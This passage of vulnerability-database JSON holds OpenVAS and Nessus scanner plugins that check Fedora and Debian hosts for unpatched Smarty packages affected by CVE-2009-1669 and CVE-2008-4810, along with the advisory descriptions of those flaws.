"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064079", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064079", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-5516 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5516.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5516 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5516\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64079\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-5516 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64080", "href": "http://plugins.openvas.org/nasl.php?oid=64080", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5520 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5520.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5520 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5520\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.\";\n\n\n\nif(description)\n{\n script_id(64080);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5520 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64078", "href": "http://plugins.openvas.org/nasl.php?oid=64078", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-5525 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5525.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5525 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5525\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.\";\n\n\n\nif(description)\n{\n script_id(64078);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-5525 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-2.", "modified": "2018-01-03T00:00:00", "published": "2010-08-21T00:00:00", "id": "OPENVAS:136141256231067847", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067847", "type": "openvas", "title": "Debian Security Advisory DSA 1919-2 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_2.nasl 8274 2018-01-03 07:28:17Z teissa $\n# Description: Auto-generated from advisory DSA 1919-2 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A regression was found in the patch applied in DSA 1919-1 to smarty,\nwhich caused compilation failures on some specific templates. This\nupdate corrects the fix. 
For reference, the full advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.20-1.3.\n\nThe testing (squeeze) and unstable distribution (sid) are not affected\nby this regression.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67847\");\n script_version(\"$Revision: 8274 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 08:28:17 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-21 08:54:16 +0200 (Sat, 21 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_name(\"Debian Security Advisory DSA 1919-2 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.", "modified": "2018-04-06T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:136141256231066103", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066103", "type": "openvas", "title": "Debian Security Advisory DSA 1919-1 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1919-1 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. 
The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66103\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1919-1 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.14-1etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.", "modified": "2017-07-07T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:66103", "href": "http://plugins.openvas.org/nasl.php?oid=66103", "type": "openvas", "title": "Debian Security Advisory DSA 1919-1 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1919-1 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. 
The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-1\";\n\n\nif(description)\n{\n script_id(66103);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1919-1 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.14-1etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:07:22", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-05-28T00:00:00", "title": "Fedora 10 : php-Smarty-2.6.25-1.fc10 (2009-5525)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:php-Smarty"], "id": "FEDORA_2009-5525.NASL", "href": "https://www.tenable.com/plugins/nessus/38937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5525.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38937);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"FEDORA\", value:\"2009-5525\");\n\n script_name(english:\"Fedora 10 : php-Smarty-2.6.25-1.fc10 (2009-5525)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024175.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70c49c60\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"php-Smarty-2.6.25-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:22", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
